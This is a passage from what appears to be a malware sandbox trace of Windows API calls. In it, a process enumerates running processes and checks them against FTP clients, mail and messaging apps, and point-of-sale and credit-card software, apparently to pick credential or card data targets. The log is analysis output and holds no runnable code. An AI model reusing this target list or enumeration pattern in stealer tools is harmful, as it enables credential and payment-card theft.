(hObject=0x0) returned 0 [0066.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x0 [0066.875] CloseHandle (hObject=0x0) returned 0 [0066.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x698) returned 0x5bc [0066.875] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.877] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x260000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="transactions-naturals.exe") returned 0x19 [0066.877] CloseHandle (hObject=0x5bc) returned 1 [0066.877] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0) returned 0x5bc [0066.877] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.879] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1360000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="camera_intervals_organizational.exe") returned 0x23 [0066.879] CloseHandle (hObject=0x5bc) returned 1 [0066.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a4) returned 0x5bc [0066.879] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.881] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xa0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="adrian defence serbia.exe") returned 0x19 [0066.881] CloseHandle (hObject=0x5bc) returned 1 [0066.881] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x5bc [0066.881] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.882] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xbf0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="nbc promising ni.exe") returned 0x14 [0066.883] CloseHandle (hObject=0x5bc) returned 1 [0066.883] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x5bc [0066.883] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.884] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1370000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="immigration_stem.exe") returned 0x14 [0066.885] CloseHandle (hObject=0x5bc) returned 1 [0066.885] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x220) returned 0x5bc [0066.885] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.886] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xf20000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="clicks-yield.exe") returned 0x10 [0066.887] CloseHandle (hObject=0x5bc) returned 1 [0066.887] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x750) returned 0x5bc [0066.887] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.888] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xdd0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="division.exe") returned 0xc [0066.889] CloseHandle (hObject=0x5bc) returned 1 [0066.889] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x700) returned 0x5bc [0066.889] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.890] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x9e0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="cet-pass.exe") returned 0xc [0066.891] CloseHandle (hObject=0x5bc) returned 1 [0066.891] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x24c) returned 0x5bc [0066.891] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.892] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x20000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="casino_bills.exe") returned 0x10 [0066.892] CloseHandle (hObject=0x5bc) returned 1 [0066.892] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x734) returned 0x5bc [0066.893] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.894] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x12d0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="frame.exe") returned 0x9 [0066.894] CloseHandle (hObject=0x5bc) returned 1 [0066.894] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x34c) returned 0x5bc [0066.895] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.896] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x880000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="framework.exe") returned 0xd [0066.896] CloseHandle (hObject=0x5bc) returned 1 [0066.896] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x678) returned 0x5bc [0066.897] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.898] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x830000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="comments.exe") returned 0xc [0066.898] CloseHandle (hObject=0x5bc) returned 1 [0066.898] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x5bc [0066.899] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.900] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xce0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="zum.exe") returned 0x7 [0066.900] CloseHandle (hObject=0x5bc) returned 1 [0066.900] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x324) returned 0x5bc [0066.901] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.902] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x940000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="gore.exe") returned 0x8 [0066.903] CloseHandle (hObject=0x5bc) returned 1 [0066.903] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x804) returned 0x5bc [0066.903] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.904] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1f0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="analog.exe") returned 0xa [0066.905] CloseHandle (hObject=0x5bc) returned 1 [0066.905] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x814) returned 0x5bc [0066.905] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.906] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x10d0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="null.exe") returned 0x8 [0066.907] CloseHandle (hObject=0x5bc) returned 1 [0066.907] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x824) returned 0x5bc [0066.907] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.908] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x8f0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="other.exe") returned 0x9 [0066.909] CloseHandle (hObject=0x5bc) returned 1 [0066.909] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x834) returned 0x5bc [0066.909] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.910] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xc0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="imagingboost.exe") returned 0x10 [0066.911] CloseHandle (hObject=0x5bc) returned 1 [0066.911] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x844) returned 0x5bc [0066.911] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.912] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1220000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="cups.exe") returned 0x8 [0066.913] CloseHandle (hObject=0x5bc) returned 1 [0066.913] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x5bc [0066.913] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.914] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xfe0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0066.914] CloseHandle (hObject=0x5bc) returned 1 [0066.915] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x878) returned 0x5bc [0066.915] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.916] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xec0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0066.929] CloseHandle (hObject=0x5bc) returned 1 [0066.929] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x890) returned 0x5bc [0066.930] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.932] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1080000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0066.932] CloseHandle (hObject=0x5bc) returned 1 [0066.932] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b0) returned 0x5bc [0066.932] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.934] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xdd0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0066.934] CloseHandle (hObject=0x5bc) returned 1 [0066.934] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c4) returned 0x5bc [0066.934] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.936] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x8f0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0066.936] CloseHandle (hObject=0x5bc) returned 1 [0066.936] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d4) returned 0x5bc [0066.936] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.938] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x820000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0066.938] CloseHandle (hObject=0x5bc) returned 1 [0066.938] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e4) returned 0x5bc [0066.938] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.940] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x360000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0066.940] CloseHandle (hObject=0x5bc) returned 1 [0066.940] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f4) returned 0x5bc [0066.940] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.942] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1240000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0066.942] CloseHandle (hObject=0x5bc) returned 1 [0066.942] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x5bc [0066.942] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.944] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x12f0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0066.944] CloseHandle (hObject=0x5bc) returned 1 [0066.944] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x5bc [0066.944] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.946] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1110000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0066.946] CloseHandle (hObject=0x5bc) returned 1 [0066.946] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x5bc [0066.946] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.948] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xcf0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0066.948] CloseHandle (hObject=0x5bc) returned 1 [0066.948] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x5bc [0066.948] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.950] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x970000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0066.950] CloseHandle (hObject=0x5bc) returned 1 [0066.950] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x5bc [0066.950] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.952] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x160000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0066.952] CloseHandle (hObject=0x5bc) returned 1 [0066.952] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x5bc [0066.952] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.954] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1090000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0066.954] CloseHandle (hObject=0x5bc) returned 1 [0066.954] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x968) returned 0x5bc [0066.954] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.956] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x3a0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0066.956] CloseHandle (hObject=0x5bc) returned 1 [0066.956] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x978) returned 0x5bc [0066.956] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.957] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x170000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0066.958] CloseHandle (hObject=0x5bc) returned 1 [0066.958] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x988) returned 0x5bc [0066.958] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.959] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1010000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0066.960] CloseHandle (hObject=0x5bc) returned 1 [0066.960] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x998) returned 0x5bc [0066.960] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.961] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xd80000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0066.962] CloseHandle (hObject=0x5bc) returned 1 [0066.962] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a8) returned 0x5bc [0066.962] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.964] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xa90000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0066.964] CloseHandle (hObject=0x5bc) returned 1 [0066.965] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b8) returned 0x5bc [0066.965] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.966] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xd30000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0066.966] CloseHandle (hObject=0x5bc) returned 1 [0066.966] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c8) returned 0x5bc [0066.966] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.968] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x110000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0066.968] CloseHandle (hObject=0x5bc) returned 1 [0066.968] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d8) returned 0x5bc [0066.968] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.970] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1230000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0066.970] CloseHandle (hObject=0x5bc) returned 1 [0066.970] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e8) returned 0x5bc [0066.971] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.972] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xad0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0066.973] CloseHandle (hObject=0x5bc) returned 1 [0066.973] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f8) returned 0x5bc [0066.973] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.974] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x11e0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0066.975] CloseHandle (hObject=0x5bc) returned 1 [0066.975] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa08) returned 0x5bc [0066.975] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.976] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x800000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0066.977] CloseHandle (hObject=0x5bc) returned 1 [0066.977] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa18) returned 0x5bc [0066.977] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.978] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1180000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0066.979] CloseHandle (hObject=0x5bc) returned 1 [0066.979] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa28) returned 0x5bc [0066.979] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.980] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xb40000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0066.981] CloseHandle (hObject=0x5bc) returned 1 [0066.981] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa38) returned 0x5bc [0066.981] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.982] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xa30000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0066.983] CloseHandle (hObject=0x5bc) returned 1 [0066.983] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa48) returned 0x5bc [0066.983] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.984] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x10e0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0066.985] CloseHandle (hObject=0x5bc) returned 1 [0066.985] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa58) returned 0x5bc [0066.985] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.986] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xf90000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0066.987] CloseHandle (hObject=0x5bc) returned 1 [0066.987] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa68) returned 0x5bc [0066.987] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.988] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xe60000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0066.989] CloseHandle (hObject=0x5bc) returned 1 [0066.989] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa78) returned 0x5bc [0066.989] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.990] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x9c0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0066.991] CloseHandle (hObject=0x5bc) returned 1 [0066.991] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa88) returned 0x5bc [0066.991] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.992] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1200000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0066.992] CloseHandle (hObject=0x5bc) returned 1 [0066.993] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa98) returned 0x5bc [0066.993] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.994] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xdc0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0066.995] CloseHandle (hObject=0x5bc) returned 1 [0066.995] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5bc [0066.995] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.997] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xba0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0066.997] CloseHandle (hObject=0x5bc) returned 1 [0066.997] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab8) returned 0x5bc [0066.997] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0066.999] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xdb0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0066.999] CloseHandle (hObject=0x5bc) returned 1 [0066.999] OpenProcess (dwDesiredAccess=0x410, 